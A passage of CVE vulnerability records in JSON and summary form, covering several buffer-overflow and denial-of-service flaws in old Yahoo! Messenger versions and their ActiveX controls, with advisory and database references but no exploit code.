              "name": "20020221 Remote crashes in Yahoo messenger",
              "refsource": "BUGTRAQ",
              "url": "http://marc.info/?l=bugtraq\u0026m=101439616623230\u0026w=2"
            },
            {
              "name": "VU#419419",
              "refsource": "CERT-VN",
              "url": "http://www.kb.cert.org/vuls/id/419419"
            },
            {
              "name": "yahoo-messenger-imvironment-bo(8265)",
              "refsource": "XF",
              "url": "http://www.iss.net/security_center/static/8265.php"
            },
            {
              "name": "yahoo-messenger-message-bo(8264)",
              "refsource": "XF",
              "url": "http://www.iss.net/security_center/static/8264.php"
            },
            {
              "name": "4163",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/4163"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2002-0320",
    "datePublished": "2002-05-03T04:00:00",
    "dateReserved": "2002-05-01T00:00:00",
    "dateUpdated": "2024-08-08T02:42:29.167Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2007-1680 (GCVE-0-2007-1680)
Vulnerability from cvelistv5
Published
2007-04-06 01:00
Modified
2024-08-07 13:06
Severity ?
CWE
  • n/a
Summary
Stack-based buffer overflow in the createAndJoinConference function in the AudioConf ActiveX control (yacscom.dll) in Yahoo! Messenger before 20070313 allows remote attackers to execute arbitrary code via long (1) socksHostname and (2) hostname properties.
References
https://exchange.xforce.ibmcloud.com/vulnerabilities/33408 (vdb-entry, x_refsource_XF)
http://www.securityfocus.com/bid/23291 (vdb-entry, x_refsource_BID)
http://secunia.com/advisories/24742 (third-party-advisory, x_refsource_SECUNIA)
http://www.kb.cert.org/vuls/id/388377 (third-party-advisory, x_refsource_CERT-VN)
http://www.zerodayinitiative.com/advisories/ZDI-07-012.html (x_refsource_MISC)
http://securityreason.com/securityalert/2523 (third-party-advisory, x_refsource_SREASON)
http://www.vupen.com/english/advisories/2007/1219 (vdb-entry, x_refsource_VUPEN)
http://osvdb.org/34319 (vdb-entry, x_refsource_OSVDB)
http://www.securitytracker.com/id?1017867 (vdb-entry, x_refsource_SECTRACK)
http://messenger.yahoo.com/security_update.php?id=031207 (x_refsource_CONFIRM)
http://www.securityfocus.com/archive/1/464607/100/0/threaded (mailing-list, x_refsource_BUGTRAQ)
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T13:06:26.204Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "yahoo-yahooaudioconf-activex-bo(33408)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/33408"
          },
          {
            "name": "23291",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/23291"
          },
          {
            "name": "24742",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/24742"
          },
          {
            "name": "VU#388377",
            "tags": [
              "third-party-advisory",
              "x_refsource_CERT-VN",
              "x_transferred"
            ],
            "url": "http://www.kb.cert.org/vuls/id/388377"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://www.zerodayinitiative.com/advisories/ZDI-07-012.html"
          },
          {
            "name": "2523",
            "tags": [
              "third-party-advisory",
              "x_refsource_SREASON",
              "x_transferred"
            ],
            "url": "http://securityreason.com/securityalert/2523"
          },
          {
            "name": "ADV-2007-1219",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2007/1219"
          },
          {
            "name": "34319",
            "tags": [
              "vdb-entry",
              "x_refsource_OSVDB",
              "x_transferred"
            ],
            "url": "http://osvdb.org/34319"
          },
          {
            "name": "1017867",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id?1017867"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://messenger.yahoo.com/security_update.php?id=031207"
          },
          {
            "name": "20070403 ZDI-07-012: Yahoo! Messenger AudioConf ActiveX Control Buffer Overflow",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/464607/100/0/threaded"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2007-04-02T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Stack-based buffer overflow in the createAndJoinConference function in the AudioConf ActiveX control (yacscom.dll) in Yahoo! Messenger before 20070313 allows remote attackers to execute arbitrary code via long (1) socksHostname and (2) hostname properties."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-16T14:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "yahoo-yahooaudioconf-activex-bo(33408)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/33408"
        },
        {
          "name": "23291",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/23291"
        },
        {
          "name": "24742",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/24742"
        },
        {
          "name": "VU#388377",
          "tags": [
            "third-party-advisory",
            "x_refsource_CERT-VN"
          ],
          "url": "http://www.kb.cert.org/vuls/id/388377"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://www.zerodayinitiative.com/advisories/ZDI-07-012.html"
        },
        {
          "name": "2523",
          "tags": [
            "third-party-advisory",
            "x_refsource_SREASON"
          ],
          "url": "http://securityreason.com/securityalert/2523"
        },
        {
          "name": "ADV-2007-1219",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2007/1219"
        },
        {
          "name": "34319",
          "tags": [
            "vdb-entry",
            "x_refsource_OSVDB"
          ],
          "url": "http://osvdb.org/34319"
        },
        {
          "name": "1017867",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id?1017867"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://messenger.yahoo.com/security_update.php?id=031207"
        },
        {
          "name": "20070403 ZDI-07-012: Yahoo! Messenger AudioConf ActiveX Control Buffer Overflow",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/464607/100/0/threaded"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2007-1680",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Stack-based buffer overflow in the createAndJoinConference function in the AudioConf ActiveX control (yacscom.dll) in Yahoo! Messenger before 20070313 allows remote attackers to execute arbitrary code via long (1) socksHostname and (2) hostname properties."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "yahoo-yahooaudioconf-activex-bo(33408)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/33408"
            },
            {
              "name": "23291",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/23291"
            },
            {
              "name": "24742",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/24742"
            },
            {
              "name": "VU#388377",
              "refsource": "CERT-VN",
              "url": "http://www.kb.cert.org/vuls/id/388377"
            },
            {
              "name": "http://www.zerodayinitiative.com/advisories/ZDI-07-012.html",
              "refsource": "MISC",
              "url": "http://www.zerodayinitiative.com/advisories/ZDI-07-012.html"
            },
            {
              "name": "2523",
              "refsource": "SREASON",
              "url": "http://securityreason.com/securityalert/2523"
            },
            {
              "name": "ADV-2007-1219",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2007/1219"
            },
            {
              "name": "34319",
              "refsource": "OSVDB",
              "url": "http://osvdb.org/34319"
            },
            {
              "name": "1017867",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id?1017867"
            },
            {
              "name": "http://messenger.yahoo.com/security_update.php?id=031207",
              "refsource": "CONFIRM",
              "url": "http://messenger.yahoo.com/security_update.php?id=031207"
            },
            {
              "name": "20070403 ZDI-07-012: Yahoo! Messenger AudioConf ActiveX Control Buffer Overflow",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/464607/100/0/threaded"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2007-1680",
    "datePublished": "2007-04-06T01:00:00",
    "dateReserved": "2007-03-26T00:00:00",
    "dateUpdated": "2024-08-07T13:06:26.204Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2009-4171 (GCVE-0-2009-4171)
Vulnerability from cvelistv5
Published
2009-12-02 19:00
Modified
2024-08-07 06:54
Severity ?
CWE
  • n/a
Summary
An ActiveX control in YahooBridgeLib.dll for Yahoo! Messenger 9.0.0.2162, and possibly other 9.0 versions, allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) by calling the RegisterMe method with a long argument.
References
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T06:54:09.794Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "20091112 Yahoo Messenger 9 ActiveX DoS (Null Pointer) Vulnerability",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/507818/100/0/threaded"
          },
          {
            "name": "yahoo-messenger-activex-dos(54263)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/54263"
          },
          {
            "name": "37007",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/37007"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2009-11-12T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "An ActiveX control in YahooBridgeLib.dll for Yahoo! Messenger 9.0.0.2162, and possibly other 9.0 versions, allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) by calling the RegisterMe method with a long argument."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-10T18:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "20091112 Yahoo Messenger 9 ActiveX DoS (Null Pointer) Vulnerability",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/507818/100/0/threaded"
        },
        {
          "name": "yahoo-messenger-activex-dos(54263)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/54263"
        },
        {
          "name": "37007",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/37007"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2009-4171",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "An ActiveX control in YahooBridgeLib.dll for Yahoo! Messenger 9.0.0.2162, and possibly other 9.0 versions, allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) by calling the RegisterMe method with a long argument."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "20091112 Yahoo Messenger 9 ActiveX DoS (Null Pointer) Vulnerability",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/507818/100/0/threaded"
            },
            {
              "name": "yahoo-messenger-activex-dos(54263)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/54263"
            },
            {
              "name": "37007",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/37007"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2009-4171",
    "datePublished": "2009-12-02T19:00:00",
    "dateReserved": "2009-12-02T00:00:00",
    "dateUpdated": "2024-08-07T06:54:09.794Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2007-4635 (GCVE-0-2007-4635)
Vulnerability from cvelistv5
Published
2007-08-31 23:00
Modified
2024-09-16 16:32
Severity ?
CWE
  • n/a
Summary
Yahoo! Messenger 8.1.0.209 and 8.1.0.402 allows remote attackers to cause a denial of service (application crash) via certain file-transfer packets, possibly involving a buffer overflow, as demonstrated by ym8bug.exe. NOTE: this might be related to CVE-2007-4515. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
References
http://www.securityfocus.com/bid/25484 (vdb-entry, x_refsource_BID)
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T15:01:10.131Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "25484",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/25484"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Yahoo! Messenger 8.1.0.209 and 8.1.0.402 allows remote attackers to cause a denial of service (application crash) via certain file-transfer packets, possibly involving a buffer overflow, as demonstrated by ym8bug.exe.  NOTE: this might be related to CVE-2007-4515.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2007-08-31T23:00:00Z",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "25484",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/25484"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2007-4635",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Yahoo! Messenger 8.1.0.209 and 8.1.0.402 allows remote attackers to cause a denial of service (application crash) via certain file-transfer packets, possibly involving a buffer overflow, as demonstrated by ym8bug.exe.  NOTE: this might be related to CVE-2007-4515.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "25484",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/25484"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2007-4635",
    "datePublished": "2007-08-31T23:00:00Z",
    "dateReserved": "2007-08-31T00:00:00Z",
    "dateUpdated": "2024-09-16T16:32:44.068Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2007-3147 (GCVE-0-2007-3147)
Vulnerability from cvelistv5
Published
2007-06-11 18:00
Modified
2024-08-07 14:05
Severity ?
CWE
  • n/a
Summary
Buffer overflow in the Yahoo! Webcam Upload ActiveX control in ywcupl.dll 2.0.1.4 for Yahoo! Messenger 8.1.0.249 allows remote attackers to execute arbitrary code via a long server property value to the send method. NOTE: some of these details are obtained from third party information.
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T14:05:28.302Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "20070606 Yahoo 0day ActiveX Webcam Exploit",
            "tags": [
              "mailing-list",
              "x_refsource_FULLDISC",
              "x_transferred"
            ],
            "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063817.html"
          },
          {
            "name": "4042",
            "tags": [
              "exploit",
              "x_refsource_EXPLOIT-DB",
              "x_transferred"
            ],
            "url": "https://www.exploit-db.com/exploits/4042"
          },
          {
            "name": "24354",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/24354"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://research.eeye.com/html/advisories/upcoming/20070605.html"
          },
          {
            "name": "VU#949817",
            "tags": [
              "third-party-advisory",
              "x_refsource_CERT-VN",
              "x_transferred"
            ],
            "url": "http://www.kb.cert.org/vuls/id/949817"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://messenger.yahoo.com/security_update.php?id=060707"
          },
          {
            "name": "ADV-2007-2094",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2007/2094"
          },
          {
            "name": "25547",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/25547"
          },
          {
            "name": "20070608 EEYE: Yahoo Webcam ActiveX Controls Multiple Buffer Overflows",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/470861/100/0/threaded"
          },
          {
            "name": "1018204",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://securitytracker.com/id?1018204"
          },
          {
            "name": "yahoo-webcam-upload-bo(34758)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34758"
          },
          {
            "name": "24341",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/24341"
          },
          {
            "name": "1018203",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id?1018203"
          },
          {
            "name": "2809",
            "tags": [
              "third-party-advisory",
              "x_refsource_SREASON",
              "x_transferred"
            ],
            "url": "http://securityreason.com/securityalert/2809"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://research.eeye.com/html/advisories/published/AD20070608.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2007-06-06T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Buffer overflow in the Yahoo! Webcam Upload ActiveX control in ywcupl.dll 2.0.1.4 for Yahoo! Messenger 8.1.0.249 allows remote attackers to execute arbitrary code via a long server property value to the send method.  NOTE: some of these details are obtained from third party information."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-16T14:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "20070606 Yahoo 0day ActiveX Webcam Exploit",
          "tags": [
            "mailing-list",
            "x_refsource_FULLDISC"
          ],
          "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063817.html"
        },
        {
          "name": "4042",
          "tags": [
            "exploit",
            "x_refsource_EXPLOIT-DB"
          ],
          "url": "https://www.exploit-db.com/exploits/4042"
        },
        {
          "name": "24354",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/24354"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://research.eeye.com/html/advisories/upcoming/20070605.html"
        },
        {
          "name": "VU#949817",
          "tags": [
            "third-party-advisory",
            "x_refsource_CERT-VN"
          ],
          "url": "http://www.kb.cert.org/vuls/id/949817"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://messenger.yahoo.com/security_update.php?id=060707"
        },
        {
          "name": "ADV-2007-2094",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2007/2094"
        },
        {
          "name": "25547",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/25547"
        },
        {
          "name": "20070608 EEYE: Yahoo Webcam ActiveX Controls Multiple Buffer Overflows",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/470861/100/0/threaded"
        },
        {
          "name": "1018204",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://securitytracker.com/id?1018204"
        },
        {
          "name": "yahoo-webcam-upload-bo(34758)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34758"
        },
        {
          "name": "24341",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/24341"
        },
        {
          "name": "1018203",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id?1018203"
        },
        {
          "name": "2809",
          "tags": [
            "third-party-advisory",
            "x_refsource_SREASON"
          ],
          "url": "http://securityreason.com/securityalert/2809"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://research.eeye.com/html/advisories/published/AD20070608.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2007-3147",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Buffer overflow in the Yahoo! Webcam Upload ActiveX control in ywcupl.dll 2.0.1.4 for Yahoo! Messenger 8.1.0.249 allows remote attackers to execute arbitrary code via a long server property value to the send method.  NOTE: some of these details are obtained from third party information."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "20070606 Yahoo 0day ActiveX Webcam Exploit",
              "refsource": "FULLDISC",
              "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063817.html"
            },
            {
              "name": "4042",
              "refsource": "EXPLOIT-DB",
              "url": "https://www.exploit-db.com/exploits/4042"
            },
            {
              "name": "24354",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/24354"
            },
            {
              "name": "http://research.eeye.com/html/advisories/upcoming/20070605.html",
              "refsource": "MISC",
              "url": "http://research.eeye.com/html/advisories/upcoming/20070605.html"
            },
            {
              "name": "VU#949817",
              "refsource": "CERT-VN",
              "url": "http://www.kb.cert.org/vuls/id/949817"
            },
            {
              "name": "http://messenger.yahoo.com/security_update.php?id=060707",
              "refsource": "CONFIRM",
              "url": "http://messenger.yahoo.com/security_update.php?id=060707"
            },
            {
              "name": "ADV-2007-2094",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2007/2094"
            },
            {
              "name": "25547",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/25547"
            },
            {
              "name": "20070608 EEYE: Yahoo Webcam ActiveX Controls Multiple Buffer Overflows",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/470861/100/0/threaded"
            },
            {
              "name": "1018204",
              "refsource": "SECTRACK",
              "url": "http://securitytracker.com/id?1018204"
            },
            {
              "name": "yahoo-webcam-upload-bo(34758)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34758"
            },
            {
              "name": "24341",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/24341"
            },
            {
              "name": "1018203",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id?1018203"
            },
            {
              "name": "2809",
              "refsource": "SREASON",
              "url": "http://securityreason.com/securityalert/2809"
            },
            {
              "name": "http://research.eeye.com/html/advisories/published/AD20070608.html",
              "refsource": "MISC",
              "url": "http://research.eeye.com/html/advisories/published/AD20070608.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2007-3147",
    "datePublished": "2007-06-11T18:00:00",
    "dateReserved": "2007-06-11T00:00:00",
    "dateUpdated": "2024-08-07T14:05:28.302Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2005-0737 (GCVE-0-2005-0737)
Vulnerability from cvelistv5
Published
2005-03-13 05:00
Modified
2024-09-17 02:01
Severity ?
CWE
  • n/a
Summary
Buffer overflow in Yahoo! Messenger allows remote attackers to execute arbitrary code via the offline mode.
References
http://seclists.org/lists/fulldisclosure/2005/Mar/0284.html (mailing-list, x_refsource_FULLDISC)
http://www.securityfocus.com/bid/12750 (vdb-entry, x_refsource_BID)
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T21:21:06.520Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "20050308 Yahoo! Messenger Offline Mode Status Remote Buffer Overflow Vulnerability",
            "tags": [
              "mailing-list",
              "x_refsource_FULLDISC",
              "x_transferred"
            ],
            "url": "http://seclists.org/lists/fulldisclosure/2005/Mar/0284.html"
          },
          {
            "name": "12750",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/12750"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
